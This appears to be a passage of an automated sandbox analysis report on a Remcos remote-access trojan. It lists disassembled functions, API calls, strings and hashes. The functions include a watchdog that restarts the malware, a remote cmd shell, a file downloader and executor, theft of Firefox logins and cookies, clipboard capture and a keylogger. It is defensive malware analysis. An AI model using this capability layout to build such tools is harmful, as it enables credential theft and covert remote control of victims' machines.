Instruction ID: f797c493580bcbb57e031b514bcf368a6941c3076375826e2c1e25af396318bd
Opcode Fuzzy Hash: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
Instruction Fuzzy Hash: AA113A37A009319BAF21DE69ECC086B7391AB847247164332FC15BB346E634EC0286E9

Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

Function 00443005 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD

Function 00443649 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD

Non-executed Functions

Function 00410B5C Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00410B6B

Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
CloseHandle.KERNEL32(00000000), ref: 00410BBA
CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F

Strings

!G, xrefs: 00410C47
Remcos restarted by watchdog!, xrefs: 00410BC5
svchost.exe, xrefs: 00410D2A
\system32\, xrefs: 00410C6E
WDH, xrefs: 00410C1A, 00410C20, 00410E85
fsutil.exe, xrefs: 00410D74
\SysWOW64\, xrefs: 00410CC6
WinDir, xrefs: 00410C80, 00410CD5
rmclient.exe, xrefs: 00410D4F
Watchdog launch failed!, xrefs: 00410DE8
(#G, xrefs: 00410B98
Watchdog module activated, xrefs: 00410BE9, 00410E41

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
API String ID: 3018269243-1736093966
Opcode ID: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
Opcode Fuzzy Hash: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F

Function 00406D28 Relevance: 32.3, APIs: 9, Strings: 9, Instructions: 810fileCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00406D4A
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
DeleteFileW.KERNEL32(00000000), ref: 00406E3A

Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
DeleteFileA.KERNEL32(?), ref: 0040768E

Strings

Unable to delete: , xrefs: 00406E98
Failed to download file: , xrefs: 00407136
open, xrefs: 00407222
Deleted file: , xrefs: 00406E59
Unable to rename file!, xrefs: 004074A4
Browsing directory: , xrefs: 004072C9
Downloading file: , xrefs: 0040700E
Downloaded file: , xrefs: 004070BF
Executing file: , xrefs: 0040723E

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
API String ID: 1385304114-1507758755
Opcode ID: 626ef3b8f9062db525714a88906249109dc5c65f2cd14a7855506d530d800d82
Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
Opcode Fuzzy Hash: 626ef3b8f9062db525714a88906249109dc5c65f2cd14a7855506d530d800d82
Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B

Function 0040567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056C6

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

__Init_thread_footer.LIBCMT ref: 00405703
CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
TerminateProcess.KERNEL32(00000000), ref: 004059F7
CloseHandle.KERNEL32 ref: 00405A03
CloseHandle.KERNEL32 ref: 00405A0B
CloseHandle.KERNEL32 ref: 00405A1D
CloseHandle.KERNEL32 ref: 00405A25

Strings

SystemDrive, xrefs: 00405741
cmd.exe, xrefs: 0040572D

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: SystemDrive$cmd.exe
API String ID: 2994406822-3633465311
Opcode ID: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
Opcode Fuzzy Hash: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E

Function 0040AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
FindClose.KERNEL32(00000000), ref: 0040AB0A
FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
FindClose.KERNEL32(00000000), ref: 0040AC53

Strings

UserProfile, xrefs: 0040AAA1
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040AA93
[Firefox StoredLogins not found], xrefs: 0040AB15
\logins.json, xrefs: 0040AB75
\key3.db, xrefs: 0040ABB7
[Firefox StoredLogins Cleared!], xrefs: 0040AC40

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
Opcode Fuzzy Hash: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A

Function 0040AC78 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
FindClose.KERNEL32(00000000), ref: 0040AD0A
FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
FindClose.KERNEL32(00000000), ref: 0040ADF0
FindClose.KERNEL32(00000000), ref: 0040AE11

Strings

\cookies.sqlite, xrefs: 0040AD6D
[Firefox Cookies not found], xrefs: 0040AD15, 0040ADDD
UserProfile, xrefs: 0040ACA1
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040AC93
[Firefox cookies found, cleared!], xrefs: 0040AE20

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
Opcode Fuzzy Hash: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E

Function 00414EC1 Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00414EC2
EmptyClipboard.USER32 ref: 00414ED0
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
GlobalLock.KERNEL32(00000000), ref: 00414EF9
GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
CloseClipboard.USER32 ref: 00414F55
OpenClipboard.USER32 ref: 00414F5C
GetClipboardData.USER32(0000000D), ref: 00414F6C
GlobalLock.KERNEL32(00000000), ref: 00414F75
GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
CloseClipboard.USER32 ref: 00414F84

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID:
API String ID: 3520204547-0
Opcode ID: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
Opcode Fuzzy Hash: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A

Function 004175E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON

Download Yara Rule

Strings

6, xrefs: 004177CB
0, xrefs: 0041760B
1, xrefs: 0041764D
3, xrefs: 0041770C
2, xrefs: 004176AC
4, xrefs: 00417770
7, xrefs: 004177E2
5, xrefs: 004177C1

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
Opcode Fuzzy Hash: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6

Function 004186FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
GetLastError.KERNEL32 ref: 00418771
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
Opcode Fuzzy Hash: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A

Function 0040B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
FindClose.KERNEL32(00000000), ref: 0040B3BE
FindClose.KERNEL32(00000000), ref: 0040B3E9

Strings

\cookies.sqlite, xrefs: 0040B34A
\Mozilla\Firefox\Profiles\, xrefs: 0040B2AF
AppData, xrefs: 0040B299

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
Opcode Fuzzy Hash: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D

Function 0041A01B Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125

Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB

GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19

Function 00410763 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207

SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
SetLastError.KERNEL32(0000000E), ref: 0041082E

Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718

GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
HeapAlloc.KERNEL32(00000000), ref: 0041087C
SetLastError.KERNEL32(0000045A), ref: 0041098F

Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53

Strings

$.F, xrefs: 00410767

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID: $.F
API String ID: 3950776272-1421728423
Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9

Function 00409340 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
GetLastError.KERNEL32 ref: 00409375

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
TranslateMessage.USER32(?), ref: 004093D2
DispatchMessageA.USER32(?), ref: 004093DD

Strings

Keylogger initialization failure: error , xrefs: 00409389

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
Opcode Fuzzy Hash: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A

Function 004128E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
GetProcAddress.KERNEL32(00000000), ref: 00412CC1

Strings

Shlwapi.dll, xrefs: 00412CB5
SHDeleteKeyW, xrefs: 00412CB0

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: f2d69b9d43562cab7e836be07482607efef349bb97d02b02476618c5377839be
Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
Opcode Fuzzy Hash: f2d69b9d43562cab7e836be07482607efef349bb97d02b02476618c5377839be
Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A

Function 0044F7F0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

Part of subcall function 00445725: _free.LIBCMT ref: 00445784
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791

GetUserDefaultLCID.KERNEL32 ref: 0044F8FC
IsValidCodePage.KERNEL32(00000000), ref: 0044F957
IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0044F9CD

Strings

e]j[/, xrefs: 0044F7F8

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: e]j[/
API String ID: 745075371-424226671
Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769

Function 0040E18D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D

Sleep.KERNEL32(00000BB8), ref: 0040E243
ExitProcess.KERNEL32 ref: 0040E2B4

Strings

override, xrefs: 0040E1B2
!G, xrefs: 0040E19E
3.8.0 Pro, xrefs: 0040E21E, 0040E28D
pth_unenc, xrefs: 0040E1A3, 0040E1EC, 0040E25B

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 3.8.0 Pro$override$pth_unenc$!G
API String ID: 2281282204-1386060931
Opcode ID: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
Opcode Fuzzy Hash: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF

Function 0041936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON

